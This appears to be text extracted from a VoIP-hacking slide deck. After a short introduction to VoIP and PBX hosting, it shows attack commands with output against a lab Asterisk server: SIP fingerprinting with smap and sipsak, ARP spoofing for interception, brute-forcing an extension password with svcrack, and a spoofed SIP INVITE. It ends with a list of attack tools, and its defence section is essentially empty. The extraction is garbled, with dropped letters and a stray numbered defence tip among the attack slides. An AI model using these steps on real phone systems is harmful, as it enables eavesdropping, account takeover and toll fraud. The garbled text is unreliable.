Académique Documents
Professionnel Documents
Culture Documents
By Ahmad Qubbaj
VOIP introduction:
Voice over Internet Protocol (VoIP) is a methodology and group of technologies for the
delivery of voice communications and multimedia sessions over Internet Protocol (IP)
networks, such as the Internet. Other terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, IP
communications, and broadband phone service.
VoIP is an exciting technology which provides many beneits and cost efective
solutions for communication. More and more small and enterprise businesses are
replacing their old traditional telephony systems with an IP based ones.
A VoIP based PBX can provide many features such as: Multiple Extensions, Caller ID,
Voice mail, IVR capabilities, Recording of conversations, Logging, Usage with hardware
based telephones or software based aka soft phones.
Now days there are many vendors for PBX, IP telephones, VoIP services and equipment
such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON With new technology comes
a new challenge for both the defensive and ofensive side of security.
Self Hosted
A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony
service provider PSTN via a SIP Trunk/PRI, the VoIP traic lows through a dedicated
Vlan.
Hosted Services
There is no need for a PBX at site. Just a switch, a router, IP phones and a connection
to the service provider PBX via Internet or IP/VPN connection, each phone is
conigured with SIP account information.
asterisk
192.168.0.104
Centos
7/01/2013
ATTACK..
root@qubbaj:~# ./smap -O 192.168.0.104
smap 0.6.0 <hs@123.org> http://www.wormulon.net/
192.168.0.104: ICMP reachable, SIP enabled
best guess (77% sure) fingerprint:
Asterisk PBX SVN-trunk-r56579
<-Server: Asterisk PBX 1.6.2.0
<-1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
1 host scanned, 1 ICMP reachable, 1 SIP enabled (1 host scanned, 1
ICMP reachable, 1 SIP enabled (100.0%)
root@qubbaj:~#
root@qubbaj:~# sipsak -vv -s sip:192.168.0.104
From: sip:sipsak@127.0.1.1:54669;tag=7244113d
To: sip:192.168.0.104;tag=as383f41be
Call-ID: 1917063485@127.0.1.1
CSeq: 1 OPTIONS
<--
5) Allow only one or two calls at a time per SIP entity, where possible. At the
worst, limiting your exposure to toll fraud is a wise thing to do. This also limits
your exposure when legitimate password holders on your system lose control of
their passphrase writing it on the bottom of the SIP phone, for instance, which
Ive seen.
ATTACK..
root@qubbaj:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@qubbaj:~# arpspoof -i wlan0 -t 192.168.0.104 192.168.0.2
ATTACK..
root@qubbaj:sipvicious# ./svcrack.py -u6020 -d pass.txt 192.168.0.104
| Extension | Password |
-----------------------| 6020
| 6020pass |
root@qubbaj:sipvicious#
ATTACK..
SIP request INVITE from header.
INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
DEFENCE..
I have no idea..
fping
Nessus
nmap
snmpwalk
SNSscan
SuperScan
VLANping
Enumeration
netcat
SiVuS
sipsak
SIPSCAN
smap
TFTP Brute Forcer
Angst
Cain and Abel
DTMF Decoder
dsniff
NetStumbler
Oreka
VoIPong
vomit
Network and Application Interception
arpwatch
Cain and Abel
dsniff
ettercap
fragrouter
siprogue
XArp
Cisco Uniied CallManager
IAX Flooder
IAX Enumerator
Fuzzing
INVITE Flooder
RTP Flooder
UDP Flooder
UDP Flooder w/VLAN support
Signaling and Media Manipulation
AuthTool
BYE Teardown
Check Sync Phone Rebooter
RedirectPoison
Registration Hijacker
Registration Eraser
Registration Adder
RTP InsertSound v2.0
RTP InsertSound v3.0
RTP MixSound v2.0
RTP MixSound v3.0
References
https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Endler.pdf
http://en.wikipedia.org/wiki/Voice_over_IP
http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
http://www.hackingvoip.com/sec_tools.html